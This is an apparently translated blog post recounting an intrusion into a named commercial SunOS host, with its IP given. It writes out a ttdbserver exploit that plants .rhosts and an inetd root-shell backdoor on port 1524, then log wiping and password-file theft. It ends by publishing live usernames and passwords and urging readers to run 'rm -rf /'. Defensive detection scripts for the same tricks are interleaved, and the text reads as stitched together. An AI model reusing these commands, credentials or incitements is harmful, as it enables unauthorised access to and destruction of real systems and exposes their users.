
Friday, 11 November 2011

SunOS 5.5.1 Walkthrough

analysist

Security: is it to be judged by practice, or by hot air? For some people that question could be argued over for a few hundred years. I have no such spare time; it is better spent improving my own skills.

Put it this way: without Morris's worm on UNIX back then, who knows how many years it would have taken for today's viruses to appear, or for the DoS attacks that, like the worm, exhaust system resources and bring down services; likewise, without the finger attack of that era, where would today's many remote exploits have come from? In short, computer security would probably still be stuck at the UNIX model of the time: login management, drwxrwxrwx, and system and user process spaces that kept out of each other's way, with a core dump for anyone who crossed the line. Heavens, after a hefty price was paid, how fragile that security model looks today.

To those who like to play Ma Su: please don't be so self-righteous. Perhaps the day will come when your system gets wrecked, and what awaits you will be more than everyone's laughter!

OK, back to the subject. What follows is a US site I went through; as for its system administrator, "detestable" is the only word I have for him.

io.jtan.com
207.106.84.135

That was at the end of November last year. By chance my scan turned up this address (it wasn't this IP at the time; the host kept me busy for a while and later moved to this one).

A look with rpcinfo: heh, quite a few RPC daemons open. Well, with an opportunity like that I had to give it a try (this was right when everyone was seething over the Yankees bombing the embassy; damn them). Find an old remote exploit, say the one for ttdbserver (100083), find a Taiwanese SunOS box to use as a stepping stone, compile it, and:

$ ./ttdb 207.106.84.135 "echo '+ +'>/usr/.rhosts;"

Heh, the attack actually succeeded!
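The rpcinfo step above is also the defender's first check: a portmapper listing tells you which legacy RPC services a SunOS 5.5.1-era host exposes to the network. The following is an added example, not code from the post or from jtan; it parses `rpcinfo -p` output and flags program numbers with a history of remote exploits. Only 100083 (ttdbserver) is mentioned in the post; the other program numbers in the table (cmsd, sadmind, status, rstatd, rusersd) are standard /etc/rpc assignments added here, and the sample listing is constructed.

```shell
#!/bin/sh
# Added example (not code from the post): audit an `rpcinfo -p` listing for
# legacy RPC services that were remotely exploitable on hosts of this era.
# The program numbers are the standard /etc/rpc assignments; only 100083
# (ttdbserver) is mentioned in the post, the rest are added here.

RISKY_RPC='100083 ttdbserverd
100068 cmsd
100232 sadmind
100024 status
100001 rstatd
100002 rusersd'

# flag_risky_rpc: `rpcinfo -p` output on stdin. Prints one line per flagged
# program/protocol pair as "prog proto port name"; exits 1 if any were found,
# so it can sit in a cron job or a post-install check.
flag_risky_rpc() {
    awk -v table="$RISKY_RPC" '
        BEGIN {
            n = split(table, rows, "\n")
            for (i = 1; i <= n; i++) { split(rows[i], f, " "); name[f[1]] = f[2] }
        }
        # data lines start with a numeric program number; the header does not
        $1 ~ /^[0-9]+$/ && ($1 in name) && !seen[$1, $3]++ {
            print $1, $3, $4, name[$1]; hits++
        }
        END { exit (hits > 0) }
    '
}

# count_risky_rpc LISTING: number of flagged lines for a listing held in a variable
count_risky_rpc() {
    printf '%s\n' "$1" | flag_risky_rpc | wc -l | tr -d ' '
}

# Constructed sample listing, not a capture from io.jtan.com.
SAMPLE_RPCINFO='   program vers proto   port  service
    100000    4   tcp    111  rpcbind
    100000    3   udp    111  rpcbind
    100083    1   tcp  32773  ttdbserverd
    100068    2   udp  32774  cmsd
    100068    2   tcp  32774  cmsd
    100024    1   udp  32775  status
    100003    2   udp   2049  nfs'

# Usage on a live host: rpcinfo -p "$target" | flag_risky_rpc
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_RPCINFO" | flag_risky_rpc
fi
```

On the sample listing the check reports ttdbserverd, cmsd (both transports) and status, and returns a non-zero exit so a wrapper script can fail loudly. The program number is the thing to key on: the service column comes from the scanning host's /etc/rpc and may be blank or differ from the target's naming.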

Having seen this, you're better off not looking at their www.jtan.com; if you do, and you're in the US, I think you'll never pay to use their shell accounts. This broken, and they still dare to boast that their shell account service is secure. Some nerve. @#$%^!

I wasn't going to use

$ rlogin -l bin 207.106.84.135

to get in.

The following was less trouble:

$ ./ttdb 207.106.84.135 "echo 'ingreslock stream tcp nowait root /bin/sh sh -i' > /tmp/.x; /usr/sbin/inetd -s /tmp/.x; rm -f /tmp/.x;"

Then:

$ telnet 207.106.84.135 1524

# w
Got root.
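The ingreslock line above relies on inetd handing a listening socket straight to /bin/sh, and because /tmp/.x is deleted as soon as inetd has read it, the only traces left are a second inetd process with an odd argument and the listener on port 1524 (netstat -an will show it). The following is an added example, not code from the post or from jtan, showing both checks as they would be run on the host: one over inetd.conf-format text, one over `ps -ef` output. The samples are constructed, and the config path assumptions are Solaris 2.x (/etc/inetd.conf is a link to /etc/inet/inetd.conf).

```shell
#!/bin/sh
# Added example: spot an inetd-based root shell like the one planted above.
# Two checks: (1) inetd.conf-format entries that hand a socket to a shell or
# run a server out of a world-writable directory; (2) `ps -ef` entries for an
# inetd started with a config file other than the system one, which is the
# only trace left once /tmp/.x has been removed.

# flag_inetd_shells: inetd.conf text on stdin; prints one line per suspect
# entry and exits 1 if any were found.
flag_inetd_shells() {
    awk '
        /^[ \t]*#/ || NF < 6 { next }            # comments, blanks, junk
        {
            why = ""
            if ($6 ~ /^\/(var\/)?tmp\//) why = "server in world-writable dir"
            for (i = 6; i <= NF; i++)
                if ($i ~ /(^|\/)(sh|ksh|csh|bash|tcsh|zsh)$/) why = "spawns a shell as " $5
            if (why != "") { print "line " NR ": " why ": " $0; hits++ }
        }
        END { exit (hits > 0) }
    '
}

# flag_inetd_procs: `ps -ef` output on stdin; flags inetd processes whose
# positional argument (the config file) is not the stock one. Assumption:
# Solaris 2.x, where /etc/inetd.conf is a link to /etc/inet/inetd.conf.
# The command column is located by name because STIME may be one or two fields.
flag_inetd_procs() {
    awk '
        {
            for (i = 1; i <= NF; i++) if ($i ~ /(^|\/)inetd$/) break
            if (i > NF) next
            conf = ""
            for (j = i + 1; j <= NF; j++) if ($j !~ /^-/) conf = $j
            if (conf != "" && conf != "/etc/inet/inetd.conf" && conf != "/etc/inetd.conf") {
                print "pid " $2 ": inetd started with non-standard config " conf; hits++
            }
        }
        END { exit (hits > 0) }
    '
}

# count_lines: for callers that want a number rather than an exit code
count_lines() { wc -l | tr -d ' '; }

# Constructed samples, not captures from io.jtan.com.
SAMPLE_INETD_CONF='# constructed inetd.conf; the last entry is the one from the post
ftp        stream tcp     nowait root /usr/sbin/in.ftpd           in.ftpd
telnet     stream tcp     nowait root /usr/sbin/in.telnetd        in.telnetd
shell      stream tcp     nowait root /usr/sbin/in.rshd           in.rshd
100083/1   tli    rpc/tcp wait   root /usr/dt/bin/rpc.ttdbserverd rpc.ttdbserverd
ingreslock stream tcp     nowait root /bin/sh                     sh -i'

SAMPLE_PS='     UID   PID  PPID  C    STIME TTY      TIME CMD
    root   131     1  0   Nov 28 ?        0:00 /usr/sbin/inetd -s
    root  4412     1  0 02:13:07 ?        0:00 /usr/sbin/inetd -s /tmp/.x
    root  4413  4412  0 02:13:40 ?        0:00 sh -i'

# Usage on a live host:
#   flag_inetd_shells < /etc/inet/inetd.conf
#   ps -ef | flag_inetd_procs
if [ "${1:-}" = "--demo" ]; then
    printf '%s\n' "$SAMPLE_INETD_CONF" | flag_inetd_shells
    printf '%s\n' "$SAMPLE_PS" | flag_inetd_procs
fi
```

The process check is the one that matters after the fact: the planted config is gone, and the real inetd.conf is clean, so only the second inetd (pid 4412 in the sample, with /tmp/.x still visible in its argument list) and its child shell give the game away. The cleanup that follows in the post kills that shell but leaves the extra inetd running.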

A quick cleanup:

# rm /core;
# cp /dev/null /var/adm/messages;
# rm /usr/bin/.rhosts;
# kill -9 XXXXXX (the PID of your shell on port 1524)

Grab the passwd, shadow and hosts files.

By then it was very late here, daytime on the US side, so I had to log out.

The next day I came in through the front door with a cracked ordinary user's password and, using another old local exploit, ufsrestore, actually got root again. After tidying up I couldn't resist installing a sniffer.

On the third day I went back up and got a dozen or so local users' passwords, plus a few users' passwords for telnet sessions to other hosts. Since it was a commercial site, I kindly sent a mail to the system administrator (damn, far too kind of me).

I think system administrators are all like this: say you try logging into the admin account with the password admin, and it works. If you kindly report it to him, that's when your troubles begin. Believe me, it's a law.

On the fourth day the hole had been patched. The superfluous RPC daemons had been shut down too.

$ ls -la /usr/lib/fs/ufs/ufs*

Fine, let me try another local exploit; I remembered I had one in a backup directory, so I ran it.

$ $BACKUP_DIR/my_ex
File not found.

$ ls -la $BACKUP_DIR/my_ex

-rwxr-xr-x 23456 my_ex .....

It was plainly there, so how could it be not found?

At that point my telnet process got killed.

I telnetted to 207.106.84.135 again and got in: a heap of warning garbage.

I switched stepping stones, telnetted again, and went in as a different user.

$ cat $BACKUP_DIR/my_ex

SHIT! It had been replaced with a shell script, whose job of course was: whenever someone runs this program, send a report on the current system state (by email) to the system administrator! The funny part is that the rest of the file was filled with XXX to pad it out to the original length.

A look at that user's mail turned up a message from the system administrator about how cleverly he had discovered that someone inside was stealing user passwords, asking users to change theirs. It completely covered up the truth that the system was insecure and had been broken into. Thoroughly irresponsible toward the users. @#$%! I had been about to stop playing, but after reading that: fine! With a sysadmin like you, I'd be happy to mess with you a bit. From then until the end of February this year it was a running battle of attack and defence. I also regret being so open with him: several times after getting root I pointed it out to him myself, and perhaps from some moral scruple I never sent a broadcast email to inform their users. Perhaps that excess of good will, far from waking them up to their responsibility to users, actually harmed the users from another angle. In the end every hole I knew of was patched by him one by one. And my anger gradually escalated to where I really wanted to get root and do a

# nohup rm -rf / &

to send it to its final rest. As the difficulty rose, and work got busy, I stopped playing for nearly five months. A gentleman's revenge is not too late even after ten years. :)

Last night, on a sudden impulse, I telnetted back up for a look. Good grief! I don't know who that site offended during those five months, but besides people DoSing it and slowing its services, it may also have been rm -rf /'d. They had even filed a report with the FBI, but said the FBI couldn't be counted on to solve the case and they would have to sort it out themselves, and so on. The real situation was probably worse than what they told users in the email. Heh! Someone had actually gone and laid it to rest for me. No fun at all.

I poked at it again with an exploit I myself considered pretty lousy, and holy crap:

# What is this?

At that moment the string "rm -rf /", which could wash away all my anger at that system administrator, surged into my mind. Maybe because five months had passed and the peak of the anger was gone, or maybe because I felt he had already got the punishment he deserved. In short I was "too soft-hearted", and I didn't do it.

Later, while looking for xferlog, I caught him at it. It turned out "he" (or perhaps an "expert" he had hired to hold the fort) had put a shell script in .profile, which runs at user login, to notify "him"; that is worth borrowing. So every time a user logged in, "he" knew at once.
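The two defender tricks the post runs into, the .profile notifier here and the padded report-back script that replaced my_ex earlier, are both a few lines of shell. The following is an added example, not the author's code and not jtan's; it assumes a Solaris-style /usr/lib/sendmail and uses a placeholder alert address in place of alert@jtan.com. One caveat the post does not draw: ~/.profile belongs to the user, so anyone holding that account can simply edit the hook out; /etc/profile is root-owned, is read by sh and ksh login shells before ~/.profile, and is the better home for it.

```shell
#!/bin/sh
# Added example, not the author's or jtan's code: the two defender tricks the
# intruder ran into. login_hook is the .profile notifier; make_canary swaps a
# file the intruder left behind for a script that reports whoever runs it,
# padded with X's so `ls -l` still shows the original size. Assumptions:
# Solaris-style /usr/lib/sendmail, and an alert address standing in for
# alert@jtan.com.

ALERT=${ALERT:-alert@example.invalid}       # assumed alert address
SENDMAIL=${SENDMAIL:-/usr/lib/sendmail}    # assumed Solaris sendmail path

# login_alert_body USER TTY ORIGIN HOST: the mail the login hook sends,
# kept separate so it can be checked without sending anything.
login_alert_body() {
    printf 'Subject: login: %s on %s from %s\n\n' "$1" "$4" "$3"
    printf 'user=%s\ntty=%s\norigin=%s\ntime=%s\n' "$1" "$2" "$3" "$(date '+%Y-%m-%d %H:%M:%S')"
}

# login_hook: the line to call from /etc/profile (root-owned, so the user
# cannot remove it the way they can with their own ~/.profile). The origin
# is the parenthesised host in `who am i`; mail goes out in the background
# so the login does not wait for sendmail.
login_hook() {
    origin=$(who am i 2>/dev/null | sed -n 's/.*(\(.*\)).*/\1/p')
    login_alert_body "$(id -un)" "$(tty 2>/dev/null)" "${origin:-local}" "$(uname -n)" \
        | "$SENDMAIL" "$ALERT" >/dev/null 2>&1 &
}

# pad_to FILE BYTES: append a comment line of X so FILE is exactly BYTES long.
pad_to() {
    cur=$(wc -c < "$1" | tr -d ' ')
    need=$(( $2 - cur ))
    if [ "$need" -ge 2 ]; then
        awk -v n="$((need - 2))" 'BEGIN { printf "#"; while (n-- > 0) printf "X"; printf "\n" }' >> "$1"
    elif [ "$need" -eq 1 ]; then
        printf '\n' >> "$1"
    elif [ "$need" -lt 0 ]; then
        echo "pad_to: $1 is $((-need)) bytes larger than the original; size will not match" >&2
    fi
}

# make_canary TARGET QUARANTINE_DIR: keep a copy of the original (mode and
# mtime intact), overwrite TARGET in place with the reporting script, pad it
# to the original size and restore the old mtime.
make_canary() {
    target=$1; quarantine=$2
    [ -f "$target" ] || { echo "make_canary: $target: no such file" >&2; return 1; }
    size=$(wc -c < "$target" | tr -d ' ')
    saved="$quarantine/$(basename "$target").orig"
    mkdir -p "$quarantine" && cp -p "$target" "$saved" || return 1
    {
        printf "#!/bin/sh\nALERT='%s'\nSENDMAIL='%s'\n" "$ALERT" "$SENDMAIL"
        cat <<'EOF'
# canary: the real file was moved aside; report the caller, then fail like a broken binary
{
    printf 'Subject: canary %s fired on %s\n\n' "$0" "$(uname -n)"
    echo "time:  $(date)"
    echo "who:   $(who am i 2>/dev/null)"
    echo "id:    $(id)"
    echo "tty:   $(tty 2>/dev/null)"
    echo "cwd:   $(pwd)"
    echo "args:  $*"
    echo "procs:"; ps -ef 2>/dev/null
} | "$SENDMAIL" "$ALERT" >/dev/null 2>&1
echo "$0: cannot execute" >&2
exit 126
EOF
    } > "$target"               # truncating in place keeps the inode and its mode bits
    pad_to "$target" "$size"
    touch -r "$saved" "$target"
}
```

Usage: `make_canary /home/jo/backup/my_ex /var/quarantine` on the host, and `login_hook` as the last line of /etc/profile. The padding is what defeats the `ls -la` check the post describes: size matches, the mode bits survive because the file is truncated rather than replaced, and touch -r puts the old mtime back, so only reading the file (as the author eventually did with cat) reveals the swap.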

Attack is hard and defence is easy, especially in computer security. I wonder whether you agree?

Anyway, when I went back up tonight, "he" had also DoSed my stepping-stone site; telnet was dreadfully slow. Accusing others of doing that sort of thing, and here is "my dear fellow" doing it too. Yankees, truly hypocritical and shameless!

Below is some information about the site. Friends with the skills might go there for some hands-on practice; it's definitely a good training ground. At the same time, please take care to protect yourselves. Friends whose skills aren't up to it, don't try it.

io.jtan.com
207.106.84.135
SunOS 5.5.1

Username: bet
Password: bet
Username: home
Password: home
Username: jo
Password: tomster

The sendmail alert@jtan.com in .profile is what sends the email notifying the system administrator, chris.

$ cat /etc/aliases

shows the IDs of the various administrators.

Note: after logging in, users get ksh.

$ mail should show the message I mentioned.

If you have any insights into this system, bring them here to share; it helps everyone improve. Watch out for whether they have the means to trace a login back to the stepping-stone machine. After you get root, please don't forget to tell me. I think that by then you will have built up to doing an "rm -rf /". Otherwise you'll regret it as I did.
